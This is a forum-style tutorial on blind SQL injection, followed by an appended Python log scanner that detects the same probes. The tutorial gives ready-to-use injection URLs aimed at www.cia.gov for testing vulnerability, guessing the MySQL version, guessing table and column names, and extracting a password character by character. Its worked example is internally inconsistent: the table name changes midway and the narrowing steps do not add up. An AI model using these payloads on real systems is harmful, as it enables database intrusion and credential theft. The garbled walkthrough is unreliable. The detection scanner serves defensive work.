Blind SQL injection
If you don't know about MySQL injection, turn around and learn it before you even consider learning this, because this is a whole different story.
1. Test for vulnerability
So you have a site, let's say:
Code:
www.cia.gov/news.php?id=1
For a blind test you append a condition that is always false:
Code:
www.cia.gov/news.php?id=1 and 1=2
If the page comes back different, or with an error message like "invalid id" or "db_error select * from xxxx@localhost call line "/"" or anything like that, then it's vulnerable.
This works because 1=2 is always false. Compare it with:
Code:
www.cia.gov/index.php?id=1 and 1=1
which should return the page as normal, because 1=1 is always true.
2. MySQL version
To find the MySQL version you use this query:
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=4
If that doesn't return the normal page, try:
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=5
3. Fuzzing tables and columns
To find the table name you have to guess it, so here is the query:
Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1
E.g. the table name is administrator, and we try:
Code:
(SELECT 1 from users limit 0,1)=1
which fails because that table doesn't exist, but if we did:
Code:
(SELECT 1 from administrator limit 0,1)=1
the page comes back as normal.
Now for the column. So the table is administrator, and we found that by fuzzing. Now we need the column name, which we fuzz with:
Code:
www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
You get my drift...
4. Extracting the password with ASCII
So now we have the table/column we need to extract. As you know, it won't just pop up on the screen, so we need to use the ASCII value of each character:
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
Now try:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
Keep narrowing it down:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>101
So it's greater than 99 but not greater than 101. Narrow it further:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
So it's greater than 99 but not greater than 100, making it 100.
The first character of the password is 100, which if you put into an ASCII converter you will see is the letter d.
Now you need to find the next character:
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>60
This one checks the second character.
Keep extracting characters until you get an error; then you will have the hash / password.
Sketch- out
A good ASCII converter can be found at
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
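Added defensive example (my own code, not from this post or any project): a small Python scanner that reads web-server access log lines and flags clients sending the request shapes from steps 1 to 4 (true/false tests, @@version guesses, table-guessing subselects and the ascii() character loop). The log lines are constructed, the regexes are assumptions about how those probes look once URL-decoded, and the extract threshold of 3 is arbitrary.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus, urlsplit

# Request shapes used in steps 1-4 above (matched on the URL-decoded query string).
PROBES = {
    "bool_test": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),          # and 1=1 / and 1=2
    "version":   re.compile(r"substring\s*\(\s*@@version", re.I),      # version guessing
    "table":     re.compile(r"\(\s*select\s+1\s+from\s+\w+\s+limit", re.I),  # table guessing
    "extract":   re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),     # per-character ascii()
}
# Common/combined log format: client ip ... "GET /path?query HTTP/1.x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify(url):
    """Return the names of the probe patterns found in the URL's decoded query."""
    query = unquote_plus(urlsplit(url).query)
    return [name for name, rx in PROBES.items() if rx.search(query)]

def detect(lines, extract_threshold=3):
    """Map client ip -> {"probes": Counter, "alert": bool}.
    An ip is flagged on any version/table probe, or on `extract_threshold` or
    more ascii() probes, which is the character-by-character loop of step 4."""
    per_ip = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        ip, url, _status = m.groups()
        per_ip[ip].update(classify(url))  # Counter.update with a list counts each item
    return {ip: {"probes": c,
                 "alert": c["version"] > 0 or c["table"] > 0
                          or c["extract"] >= extract_threshold}
            for ip, c in per_ip.items()}

# Constructed sample log (not real traffic) following the tutorial's request sequence.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1%20and%201=2 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=1+and+(SELECT+1+from+users+limit+0,1)=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /news.php?id=1+and+ascii(substring((SELECT+password+from+users+limit+0,1),1,1))%3E99 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=1+and+ascii(substring((SELECT+password+from+users+limit+0,1),1,1))%3E101 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?id=1+and+ascii(substring((SELECT+password+from+users+limit+0,1),1,1))%3E100 HTTP/1.1" 200 310',
    '198.51.100.9 - - [01/Jan/2024:10:00:07 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4890',
]

if __name__ == "__main__":
    for ip, r in detect(SAMPLE_LOG).items():
        print(ip, dict(r["probes"]), "ALERT" if r["alert"] else "ok")
```

Note that the response sizes in the constructed log (5120 vs 310 bytes) are the other signal worth alerting on: a boolean-blind loop produces the same endpoint answering with two distinct body lengths depending on the injected condition.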